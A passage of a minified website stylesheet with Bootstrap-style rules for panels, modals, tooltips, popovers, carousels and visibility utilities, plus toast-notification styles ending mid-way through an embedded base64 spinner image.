  904. a.list-group-item-warning.active,a.list-group-item-warning.active:focus,a.list-group-item-warning.active:hover{color:#fff;background-color:#8a6d3b;border-color:#8a6d3b}
  905. .list-group-item-danger{color:#a94442;background-color:#f2dede}
  906. a.list-group-item-danger{color:#a94442}
  907. a.list-group-item-danger .list-group-item-heading{color:inherit}
  908. a.list-group-item-danger:focus,a.list-group-item-danger:hover{color:#a94442;background-color:#ebcccc}
  909. a.list-group-item-danger.active,a.list-group-item-danger.active:focus,a.list-group-item-danger.active:hover{color:#fff;background-color:#a94442;border-color:#a94442}
  910. .list-group-item-heading{margin-top:0;margin-bottom:5px}
  911. .list-group-item-text{margin-bottom:0;line-height:1.3}
  912. .panel{margin-bottom:20px;background-color:#fff;border:1px solid transparent;border-radius:4px;-webkit-box-shadow:0 1px 1px rgba(0,0,0,.05);box-shadow:0 1px 1px rgba(0,0,0,.05)}
  913. .panel-body{padding:15px}
  914. .panel-heading{padding:10px 15px;border-bottom:1px solid transparent;border-top-right-radius:3px;border-top-left-radius:3px}
  915. .panel-heading>.dropdown .dropdown-toggle{color:inherit}
  916. .panel-title{margin-top:0;margin-bottom:0;font-size:16px;color:inherit}
  917. .panel-title>a{color:inherit}
  918. .panel-footer{padding:10px 15px;background-color:#f5f5f5;border-top:1px solid #ddd;border-bottom-right-radius:3px;border-bottom-left-radius:3px}
  919. .panel>.list-group{margin-bottom:0}
  920. .panel>.list-group .list-group-item{border-width:1px 0;border-radius:0}
  921. .panel>.list-group:first-child .list-group-item:first-child{border-top:0;border-top-right-radius:3px;border-top-left-radius:3px}
  922. .panel>.list-group:last-child .list-group-item:last-child{border-bottom:0;border-bottom-right-radius:3px;border-bottom-left-radius:3px}
  923. .list-group+.panel-footer,.panel-heading+.list-group .list-group-item:first-child{border-top-width:0}
  924. .panel>.panel-collapse>.table,.panel>.table,.panel>.table-responsive>.table{margin-bottom:0}
  925. .panel>.table-responsive:first-child>.table:first-child,.panel>.table:first-child{border-top-right-radius:3px;border-top-left-radius:3px}
  926. .panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:first-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:first-child,.panel>.table:first-child>thead:first-child>tr:first-child td:first-child,.panel>.table:first-child>thead:first-child>tr:first-child th:first-child{border-top-left-radius:3px}
  927. .panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table-responsive:first-child>.table:first-child>thead:first-child>tr:first-child th:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child td:last-child,.panel>.table:first-child>tbody:first-child>tr:first-child th:last-child,.panel>.table:first-child>thead:first-child>tr:first-child td:last-child,.panel>.table:first-child>thead:first-child>tr:first-child th:last-child{border-top-right-radius:3px}
  928. .panel>.table-responsive:last-child>.table:last-child,.panel>.table:last-child{border-bottom-right-radius:3px;border-bottom-left-radius:3px}
  929. .panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child td:first-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:first-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:first-child{border-bottom-left-radius:3px}
  930. .panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table-responsive:last-child>.table:last-child>tfoot:last-child>tr:last-child th:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child td:last-child,.panel>.table:last-child>tbody:last-child>tr:last-child th:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child td:last-child,.panel>.table:last-child>tfoot:last-child>tr:last-child th:last-child{border-bottom-right-radius:3px}
  931. .panel>.panel-body+.table,.panel>.panel-body+.table-responsive{border-top:1px solid #ddd}
  932. .panel>.table>tbody:first-child>tr:first-child td,.panel>.table>tbody:first-child>tr:first-child th{border-top:0}
  933. .panel>.table-bordered,.panel>.table-responsive>.table-bordered{border:0}
  934. .panel>.table-bordered>tbody>tr>td:first-child,.panel>.table-bordered>tbody>tr>th:first-child,.panel>.table-bordered>tfoot>tr>td:first-child,.panel>.table-bordered>tfoot>tr>th:first-child,.panel>.table-bordered>thead>tr>td:first-child,.panel>.table-bordered>thead>tr>th:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:first-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:first-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:first-child,.panel>.table-responsive>.table-bordered>thead>tr>td:first-child,.panel>.table-responsive>.table-bordered>thead>tr>th:first-child{border-left:0}
  935. .panel>.table-bordered>tbody>tr>td:last-child,.panel>.table-bordered>tbody>tr>th:last-child,.panel>.table-bordered>tfoot>tr>td:last-child,.panel>.table-bordered>tfoot>tr>th:last-child,.panel>.table-bordered>thead>tr>td:last-child,.panel>.table-bordered>thead>tr>th:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>td:last-child,.panel>.table-responsive>.table-bordered>tbody>tr>th:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>td:last-child,.panel>.table-responsive>.table-bordered>tfoot>tr>th:last-child,.panel>.table-responsive>.table-bordered>thead>tr>td:last-child,.panel>.table-responsive>.table-bordered>thead>tr>th:last-child{border-right:0}
  936. .panel>.table-bordered>tbody>tr:first-child>td,.panel>.table-bordered>tbody>tr:first-child>th,.panel>.table-bordered>tbody>tr:last-child>td,.panel>.table-bordered>tbody>tr:last-child>th,.panel>.table-bordered>tfoot>tr:last-child>td,.panel>.table-bordered>tfoot>tr:last-child>th,.panel>.table-bordered>thead>tr:first-child>td,.panel>.table-bordered>thead>tr:first-child>th,.panel>.table-responsive>.table-bordered>tbody>tr:first-child>td,.panel>.table-responsive>.table-bordered>tbody>tr:first-child>th,.panel>.table-responsive>.table-bordered>tbody>tr:last-child>td,.panel>.table-responsive>.table-bordered>tbody>tr:last-child>th,.panel>.table-responsive>.table-bordered>tfoot>tr:last-child>td,.panel>.table-responsive>.table-bordered>tfoot>tr:last-child>th,.panel>.table-responsive>.table-bordered>thead>tr:first-child>td,.panel>.table-responsive>.table-bordered>thead>tr:first-child>th{border-bottom:0}
  937. .panel>.table-responsive{border:0;margin-bottom:0}
  938. .panel-group{margin-bottom:20px}
  939. .panel-group .panel{margin-bottom:0;border-radius:4px}
  940. .panel-group .panel+.panel{margin-top:5px}
  941. .panel-group .panel-heading{border-bottom:0}
  942. .panel-group .panel-heading+.panel-collapse>.panel-body{border-top:1px solid #ddd}
  943. .panel-group .panel-footer{border-top:0}
  944. .panel-group .panel-footer+.panel-collapse .panel-body{border-bottom:1px solid #ddd}
  945. .panel-default{border-color:#ddd}
  946. .panel-default>.panel-heading{color:#333;background-color:#f5f5f5;border-color:#ddd}
  947. .panel-default>.panel-heading+.panel-collapse>.panel-body{border-top-color:#ddd}
  948. .panel-default>.panel-heading .badge{color:#f5f5f5;background-color:#333}
  949. .panel-default>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#ddd}
  950. .panel-primary{border-color:#5d8db3}
  951. .panel-primary>.panel-heading{color:#fff;background-color:#5d8db3;border-color:#5d8db3}
  952. .panel-primary>.panel-heading+.panel-collapse>.panel-body{border-top-color:#5d8db3}
  953. .panel-primary>.panel-heading .badge{color:#5d8db3;background-color:#fff}
  954. .panel-primary>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#5d8db3}
  955. .panel-success{border-color:#d6e9c6}
  956. .panel-success>.panel-heading{color:#3c763d;background-color:#dff0d8;border-color:#d6e9c6}
  957. .panel-success>.panel-heading+.panel-collapse>.panel-body{border-top-color:#d6e9c6}
  958. .panel-success>.panel-heading .badge{color:#dff0d8;background-color:#3c763d}
  959. .panel-success>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#d6e9c6}
  960. .panel-info{border-color:#bce8f1}
  961. .panel-info>.panel-heading{color:#31708f;background-color:#d9edf7;border-color:#bce8f1}
  962. .panel-info>.panel-heading+.panel-collapse>.panel-body{border-top-color:#bce8f1}
  963. .panel-info>.panel-heading .badge{color:#d9edf7;background-color:#31708f}
  964. .panel-info>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#bce8f1}
  965. .panel-warning{border-color:#faebcc}
  966. .panel-warning>.panel-heading{color:#8a6d3b;background-color:#fcf8e3;border-color:#faebcc}
  967. .panel-warning>.panel-heading+.panel-collapse>.panel-body{border-top-color:#faebcc}
  968. .panel-warning>.panel-heading .badge{color:#fcf8e3;background-color:#8a6d3b}
  969. .panel-warning>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#faebcc}
  970. .panel-danger{border-color:#ebccd1}
  971. .panel-danger>.panel-heading{color:#a94442;background-color:#f2dede;border-color:#ebccd1}
  972. .panel-danger>.panel-heading+.panel-collapse>.panel-body{border-top-color:#ebccd1}
  973. .panel-danger>.panel-heading .badge{color:#f2dede;background-color:#a94442}
  974. .panel-danger>.panel-footer+.panel-collapse>.panel-body{border-bottom-color:#ebccd1}
  975. .embed-responsive{position:relative;display:block;height:0;padding:0;overflow:hidden}
  976. .embed-responsive .embed-responsive-item,.embed-responsive embed,.embed-responsive iframe,.embed-responsive object{position:absolute;top:0;left:0;bottom:0;height:100%;width:100%;border:0}
  977. .embed-responsive.embed-responsive-16by9{padding-bottom:56.25%}
  978. .embed-responsive.embed-responsive-4by3{padding-bottom:75%}
  979. .well{min-height:20px;padding:19px;margin-bottom:20px;background-color:#f5f5f5;border:1px solid #e3e3e3;border-radius:4px;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,.05);box-shadow:inset 0 1px 1px rgba(0,0,0,.05)}
  980. .well blockquote{border-color:#ddd;border-color:rgba(0,0,0,.15)}
  981. .well-lg{padding:24px;border-radius:6px}
  982. .well-sm{padding:9px;border-radius:3px}
  983. .close{float:right;font-size:21px;font-weight:700;line-height:1;color:#000;text-shadow:0 1px 0 #fff;opacity:.2;filter:alpha(opacity=20)}
  984. .close:focus,.close:hover{color:#000;text-decoration:none;cursor:pointer;opacity:.5;filter:alpha(opacity=50)}
  985. button.close{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}
  986. .modal-open{overflow:hidden}
  987. .modal{display:none;overflow:hidden;position:fixed;top:0;right:0;bottom:0;left:0;z-index:1050;-webkit-overflow-scrolling:touch;outline:0}
  988. .modal.fade .modal-dialog{-webkit-transform:translate3d(0,-25%,0);transform:translate3d(0,-25%,0)}
  989. .modal.in .modal-dialog{-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}
  990. .modal-open .modal{overflow-x:hidden;overflow-y:auto}
  991. .modal-dialog{position:relative}
  992. .modal-content{position:relative;background-color:#fff;background-clip:padding-box;outline:0}
  993. .modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;background-color:#000}
  994. .modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}
  995. .modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}
  996. .modal-header{min-height:16.43px}
  997. .modal-header .close{margin-top:-2px}
  998. .modal-title{margin:0}
  999. .modal-body{position:relative}
  1000. .modal-footer{text-align:right}
  1001. .modal-footer .btn+.btn{margin-left:5px;margin-bottom:0}
  1002. .modal-footer .btn-group .btn+.btn{margin-left:-1px}
  1003. .modal-footer .btn-block+.btn-block{margin-left:0}
  1004. .modal-scrollbar-measure{position:absolute;top:-9999px;width:50px;height:50px;overflow:scroll}
  1005. @media (min-width:768px){.modal-dialog{width:600px;margin:30px auto}
  1006. .modal-content{-webkit-box-shadow:0 5px 15px rgba(0,0,0,.5);box-shadow:0 5px 15px rgba(0,0,0,.5)}
  1007. .modal-sm{width:300px}}
  1008. @media (min-width:992px){.modal-lg{width:900px}}
  1009. .tooltip{position:absolute;z-index:1070;display:block;visibility:visible;font-size:12px;line-height:1.4;opacity:0;filter:alpha(opacity=0)}
  1010. .tooltip.in{opacity:.9;filter:alpha(opacity=90)}
  1011. .tooltip.top{margin-top:-3px;padding:5px 0}
  1012. .tooltip.right{margin-left:3px;padding:0 5px}
  1013. .tooltip.bottom{margin-top:3px;padding:5px 0}
  1014. .tooltip.left{margin-left:-3px;padding:0 5px}
  1015. .tooltip-inner{max-width:200px;padding:3px 8px;color:#fff;text-align:center;text-decoration:none;background-color:#000;border-radius:4px}
  1016. .tooltip-arrow{position:absolute;width:0;height:0;border-color:transparent;border-style:solid}
  1017. .tooltip.top .tooltip-arrow{bottom:0;left:50%;margin-left:-5px;border-width:5px 5px 0;border-top-color:#000}
  1018. .tooltip.top-left .tooltip-arrow{bottom:0;left:5px;border-width:5px 5px 0;border-top-color:#000}
  1019. .tooltip.top-right .tooltip-arrow{bottom:0;right:5px;border-width:5px 5px 0;border-top-color:#000}
  1020. .tooltip.right .tooltip-arrow{top:50%;left:0;margin-top:-5px;border-width:5px 5px 5px 0;border-right-color:#000}
  1021. .tooltip.left .tooltip-arrow{top:50%;right:0;margin-top:-5px;border-width:5px 0 5px 5px;border-left-color:#000}
  1022. .tooltip.bottom .tooltip-arrow{top:0;left:50%;margin-left:-5px;border-width:0 5px 5px;border-bottom-color:#000}
  1023. .tooltip.bottom-left .tooltip-arrow{top:0;left:5px;border-width:0 5px 5px;border-bottom-color:#000}
  1024. .tooltip.bottom-right .tooltip-arrow{top:0;right:5px;border-width:0 5px 5px;border-bottom-color:#000}
  1025. .popover{position:absolute;top:0;left:0;z-index:1060;display:none;max-width:276px;padding:1px;text-align:left;background-color:#fff;background-clip:padding-box;border:1px solid #ccc;border:1px solid rgba(0,0,0,.2);border-radius:6px;-webkit-box-shadow:0 5px 10px rgba(0,0,0,.2);box-shadow:0 5px 10px rgba(0,0,0,.2);white-space:normal}
  1026. .popover.top{margin-top:-10px}
  1027. .popover.right{margin-left:10px}
  1028. .popover.bottom{margin-top:10px}
  1029. .popover.left{margin-left:-10px}
  1030. .popover-title{margin:0;padding:8px 14px;font-size:14px;font-weight:400;line-height:18px;background-color:#f7f7f7;border-bottom:1px solid #ebebeb;border-radius:5px 5px 0 0}
  1031. .popover-content{padding:9px 14px}
  1032. .popover>.arrow,.popover>.arrow:after{position:absolute;display:block;width:0;height:0;border-color:transparent;border-style:solid}
  1033. .popover>.arrow{border-width:11px}
  1034. .popover>.arrow:after{border-width:10px;content:""}
  1035. .popover.top>.arrow{left:50%;margin-left:-11px;border-bottom-width:0;border-top-color:#999;border-top-color:rgba(0,0,0,.25);bottom:-11px}
  1036. .popover.top>.arrow:after{content:" ";bottom:1px;margin-left:-10px;border-bottom-width:0;border-top-color:#fff}
  1037. .popover.right>.arrow{top:50%;left:-11px;margin-top:-11px;border-left-width:0;border-right-color:#999;border-right-color:rgba(0,0,0,.25)}
  1038. .popover.right>.arrow:after{content:" ";left:1px;bottom:-10px;border-left-width:0;border-right-color:#fff}
  1039. .popover.bottom>.arrow{left:50%;margin-left:-11px;border-top-width:0;border-bottom-color:#999;border-bottom-color:rgba(0,0,0,.25);top:-11px}
  1040. .popover.bottom>.arrow:after{content:" ";top:1px;margin-left:-10px;border-top-width:0;border-bottom-color:#fff}
  1041. .popover.left>.arrow{top:50%;right:-11px;margin-top:-11px;border-right-width:0;border-left-color:#999;border-left-color:rgba(0,0,0,.25)}
  1042. .popover.left>.arrow:after{content:" ";right:1px;border-right-width:0;border-left-color:#fff;bottom:-10px}
  1043. .carousel{position:relative}
  1044. .carousel-inner{position:relative;overflow:hidden;width:100%}
  1045. .carousel-inner>.item{display:none;position:relative;-webkit-transition:.6s ease-in-out left;-o-transition:.6s ease-in-out left;transition:.6s ease-in-out left}
  1046. .carousel-inner>.item>a>img,.carousel-inner>.item>img{line-height:1}
  1047. .carousel-inner>.active,.carousel-inner>.next,.carousel-inner>.prev{display:block}
  1048. .carousel-inner>.active{left:0}
  1049. .carousel-inner>.next,.carousel-inner>.prev{position:absolute;top:0;width:100%}
  1050. .carousel-inner>.next{left:100%}
  1051. .carousel-inner>.prev{left:-100%}
  1052. .carousel-inner>.next.left,.carousel-inner>.prev.right{left:0}
  1053. .carousel-inner>.active.left{left:-100%}
  1054. .carousel-inner>.active.right{left:100%}
  1055. .carousel-control{position:absolute;top:0;left:0;bottom:0;width:15%;opacity:.5;filter:alpha(opacity=50);font-size:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,.6)}
  1056. .carousel-control.left{background-image:-webkit-linear-gradient(left,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-image:-o-linear-gradient(left,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-image:linear-gradient(to right,rgba(0,0,0,.5) 0,rgba(0,0,0,.0001) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1)}
  1057. .carousel-control.right{left:auto;right:0;background-image:-webkit-linear-gradient(left,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-image:-o-linear-gradient(left,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-image:linear-gradient(to right,rgba(0,0,0,.0001) 0,rgba(0,0,0,.5) 100%);background-repeat:repeat-x;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1)}
  1058. .carousel-control:focus,.carousel-control:hover{outline:0;color:#fff;text-decoration:none;opacity:.9;filter:alpha(opacity=90)}
  1059. .carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next,.carousel-control .icon-prev{position:absolute;top:50%;z-index:5;display:inline-block}
  1060. .carousel-control .glyphicon-chevron-left,.carousel-control .icon-prev{left:50%;margin-left:-10px}
  1061. .carousel-control .glyphicon-chevron-right,.carousel-control .icon-next{right:50%;margin-right:-10px}
  1062. .carousel-control .icon-next,.carousel-control .icon-prev{width:20px;height:20px;margin-top:-10px;font-family:serif}
  1063. .carousel-control .icon-prev:before{content:'\2039'}
  1064. .carousel-control .icon-next:before{content:'\203a'}
  1065. .carousel-indicators{position:absolute;bottom:10px;left:50%;z-index:15;width:60%;margin-left:-30%;padding-left:0;list-style:none;text-align:center}
  1066. .carousel-indicators li{display:inline-block;width:10px;height:10px;margin:1px;text-indent:-999px;border:1px solid #fff;border-radius:10px;cursor:pointer;background-color:transparent}
  1067. .carousel-indicators .active{margin:0;width:12px;height:12px;background-color:#fff}
  1068. .carousel-caption{position:absolute;left:15%;right:15%;bottom:20px;z-index:10;padding-top:20px;padding-bottom:20px;color:#fff;text-align:center;text-shadow:0 1px 2px rgba(0,0,0,.6)}
  1069. .carousel-caption .btn{text-shadow:none}
  1070. @media screen and (min-width:768px){.carousel-control .glyphicon-chevron-left,.carousel-control .glyphicon-chevron-right,.carousel-control .icon-next,.carousel-control .icon-prev{width:30px;height:30px;margin-top:-15px;font-size:30px}
  1071. .carousel-control .glyphicon-chevron-left,.carousel-control .icon-prev{margin-left:-15px}
  1072. .carousel-control .glyphicon-chevron-right,.carousel-control .icon-next{margin-right:-15px}
  1073. .carousel-caption{left:20%;right:20%;padding-bottom:30px}
  1074. .carousel-indicators{bottom:20px}}
  1075. .btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{content:" ";display:table}
  1076. .btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}
  1077. .center-block{display:block;margin-left:auto;margin-right:auto}
  1078. .pull-right{float:right!important}
  1079. .pull-left{float:left!important}
  1080. .hide{display:none!important}
  1081. .show{display:block!important}
  1082. .invisible{visibility:hidden}
  1083. .text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}
  1084. .hidden{display:none!important;visibility:hidden!important}
  1085. .affix{position:fixed;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}
  1086. @-ms-viewport{width:device-width}
  1087. .visible-lg,.visible-lg-block,.visible-lg-inline,.visible-lg-inline-block,.visible-md,.visible-md-block,.visible-md-inline,.visible-md-inline-block,.visible-print,.visible-print-block,.visible-print-inline,.visible-print-inline-block,.visible-sm,.visible-sm-block,.visible-sm-inline,.visible-sm-inline-block,.visible-xs,.visible-xs-block,.visible-xs-inline,.visible-xs-inline-block{display:none!important}
  1088. @media (max-width:767px){.visible-xs{display:block!important}
  1089. table.visible-xs{display:table}
  1090. tr.visible-xs{display:table-row!important}
  1091. td.visible-xs,th.visible-xs{display:table-cell!important}}
  1092. @media (max-width:767px){.visible-xs-block{display:block!important}}
  1093. @media (max-width:767px){.visible-xs-inline{display:inline!important}}
  1094. @media (max-width:767px){.visible-xs-inline-block{display:inline-block!important}}
  1095. @media (min-width:768px) and (max-width:991px){.visible-sm{display:block!important}
  1096. table.visible-sm{display:table}
  1097. tr.visible-sm{display:table-row!important}
  1098. td.visible-sm,th.visible-sm{display:table-cell!important}}
  1099. @media (min-width:768px) and (max-width:991px){.visible-sm-block{display:block!important}}
  1100. @media (min-width:768px) and (max-width:991px){.visible-sm-inline{display:inline!important}}
  1101. @media (min-width:768px) and (max-width:991px){.visible-sm-inline-block{display:inline-block!important}}
  1102. @media (min-width:992px) and (max-width:1199px){.visible-md{display:block!important}
  1103. table.visible-md{display:table}
  1104. tr.visible-md{display:table-row!important}
  1105. td.visible-md,th.visible-md{display:table-cell!important}}
  1106. @media (min-width:992px) and (max-width:1199px){.visible-md-block{display:block!important}}
  1107. @media (min-width:992px) and (max-width:1199px){.visible-md-inline{display:inline!important}}
  1108. @media (min-width:992px) and (max-width:1199px){.visible-md-inline-block{display:inline-block!important}}
  1109. @media (min-width:1200px){.visible-lg{display:block!important}
  1110. table.visible-lg{display:table}
  1111. tr.visible-lg{display:table-row!important}
  1112. td.visible-lg,th.visible-lg{display:table-cell!important}}
  1113. @media (min-width:1200px){.visible-lg-block{display:block!important}}
  1114. @media (min-width:1200px){.visible-lg-inline{display:inline!important}}
  1115. @media (min-width:1200px){.visible-lg-inline-block{display:inline-block!important}}
  1116. @media (max-width:767px){.hidden-xs{display:none!important}}
  1117. @media (min-width:768px) and (max-width:991px){.hidden-sm{display:none!important}}
  1118. @media (min-width:992px) and (max-width:1199px){.hidden-md{display:none!important}}
  1119. @media (min-width:1200px){.hidden-lg{display:none!important}}
  1120. @media print{.visible-print{display:block!important}
  1121. table.visible-print{display:table}
  1122. tr.visible-print{display:table-row!important}
  1123. td.visible-print,th.visible-print{display:table-cell!important}}
  1124. @media print{.visible-print-block{display:block!important}}
  1125. @media print{.visible-print-inline{display:inline!important}}
  1126. @media print{.visible-print-inline-block{display:inline-block!important}}
  1127. @media print{.hidden-print{display:none!important}}
  1128. .toast-title{font-weight:700}
  1129. .toast-message{-ms-word-wrap:break-word;word-wrap:break-word}
  1130. .toast-message a,.toast-message label{color:#fff}
  1131. .toast-message a:hover{color:#ccc;text-decoration:none}
  1132. .toast-close-button{position:relative;right:-.3em;top:-.3em;float:right;font-size:20px;font-weight:700;color:#fff;-webkit-text-shadow:0 1px 0 #fff;text-shadow:0 1px 0 #fff;opacity:.8;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=80);filter:alpha(opacity=80)}
  1133. .toast-close-button:focus,.toast-close-button:hover{color:#000;text-decoration:none;cursor:pointer;opacity:.4;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=40);filter:alpha(opacity=40)}
  1134. button.toast-close-button{padding:0;cursor:pointer;background:0 0;border:0;-webkit-appearance:none}
  1135. .toast-top-full-width{top:0;right:0;width:100%}
  1136. .toast-bottom-full-width{bottom:0;right:0;width:100%}
  1137. .toast-top-left{top:12px;left:12px}
  1138. .toast-top-center{top:12px}
  1139. .toast-top-right{top:12px;right:12px}
  1140. .toast-bottom-right{right:12px;bottom:12px}
  1141. .toast-bottom-center{bottom:12px}
  1142. .toast-bottom-left{bottom:12px;left:12px}
  1143. .toast-center{top:45%}
  1144. #toast-container{position:fixed;z-index:999999;pointer-events:auto}
  1145. #toast-container.toast-bottom-center,#toast-container.toast-center,#toast-container.toast-top-center{width:100%;pointer-events:none}
  1146. #toast-container.toast-bottom-center>div,#toast-container.toast-center>div,#toast-container.toast-top-center>div{margin-left:auto;margin-right:auto;pointer-events:auto}
  1147. #toast-container.toast-bottom-center>button,#toast-container.toast-center>button,#toast-container.toast-top-center>button{pointer-events:auto}
  1148. #toast-container *{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box}
  1149. #toast-container>div{margin:0 0 6px;padding:15px 15px 15px 50px;width:300px;-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;background-position:15px center;background-repeat:no-repeat;-moz-box-shadow:0 0 12px #999;-webkit-box-shadow:0 0 12px #999;box-shadow:0 0 12px #999;color:#fff;opacity:.8;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=80);filter:alpha(opacity=80)}
  1150. #toast-container>:hover{-moz-box-shadow:0 0 12px #000;-webkit-box-shadow:0 0 12px #000;box-shadow:0 0 12px #000;opacity:1;-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity=100);filter:alpha(opacity=100);cursor:pointer}
  1151. #toast-container>.toast-wait{background-image:url(data:image/gif;base64,R0lGODlhIAAgAIQAAAQCBISGhMzKzERCROTm5CQiJKyurHx+fPz+/ExOTOzu7Dw+PIyOjCwqLFRWVAwKDIyKjMzOzOzq7CQmJLy6vFRSVPTy9AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQJCQAXACwAAAAAIAAgAAAF3eAljmRpnmh6VRSVqLDpIDTixOdUlFSNUDhSQUAT7ES9GnD0SFQAKWItMqr4bqKHVPDI+WiTkaOFFVlrFe83rDrT0qeIjwrT0iLdU0GOiBxhAA4VeSk6QYeIOAsQEAuJKgw+EI8nA18IA48JBAQvFxCXDI8SNAQikV+iiaQIpheWX5mJmxKeF6g0qpQmA4yOu8C7EwYWCgZswRcTFj4KyMAGlwYxDwcHhCXMXxYxBzQHKNo+3DDeCOAn0V/TddbYJA0K48gAEAFQicMWFsfwNA3JSgAIAAFfwIMIL4QAACH5BAkJABoALAAAAAAgACAAhAQCBIyKjERCRMzOzCQiJPTy9DQyNGRmZMTCxOTm5CwqLHx+fBQWFJyenNTW1Pz6/Dw6PGxubAwKDIyOjNTS1CQmJCwuLPz+/Dw+PHRydAAAAAAAAAAAAAAAAAAAAAAAAAXboCaOZGmeaKoxWcSosMkk15W8cZ7VdZaXkcEgQtrxfD9RhHchima1GwlCGUBSFCaFxMrgRtnLFhWujWHhs2nJc8KoVlWGQnEn7/i8XgOwWAB7JwoONQ4KgSQAZRcOgHgSCwsSIhZMNRZ5CzULIgaWF5h4mhecfIQ8jXmQkiODhYeIiRYGjrG2PxgBARi3IhNMAbcCnwI5BAQpAZ8TIwK6vCQVDwUVKL+WzAANTA210g/VJ8OWxQefByQE4dZMzBoInwh4zrtgn2p725YNthUFTNRuGYB3AYGBHCEAACH5BAkJAB0ALAAAAAAgACAAhAQCBISChFRWVMzKzCQiJOTm5GxqbCwuLJSWlPz6/NTW1AwODJSSlGRmZCwqLOzu7HR2dDQ2NAQGBISGhFxaXNTS1CQmJOzq7GxubDQyNKSmpPz+/Nza3AAAAAAAAAAAAAXfYCeOZGmeaKqurHBdAiuP17Zdc0lMAVHWt9yI8LA9fCPB4xEjARoNSWpis01kBpshFahurqzsZosiGpErScMAUO0maKF8Tq/bTQCIQgFp30cQXhB1BHEcXhx0FgkJFiOHVYlzi42AgoRxeRx8fn+en3UABwedKgsBAwMBCygOCjYKDisLFV4VrCUAtVUKpSZdXl8mB8EbByQWcQPFAyYZxccdB7sV0cvBzbmvvG0LBV4FrFTBYCWuNhyyHRTFFB20trh4BxmdYl4YIqepq0IRxRE+IfDCAFQHARo0NGERAgAh+QQJCQAgACwAAAAAIAAgAIUEAgSEgoRMTkzMyswcHhzk5uR0cnQUFhRcXlwsKiz09vQMCgyMiozU1tQkJiR8fnxkZmT8/vwEBgSEhoRcWlzU0tQkIiT08vR0dnQcGhxkYmQ0MjT8+vwMDgyMjozc2twAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA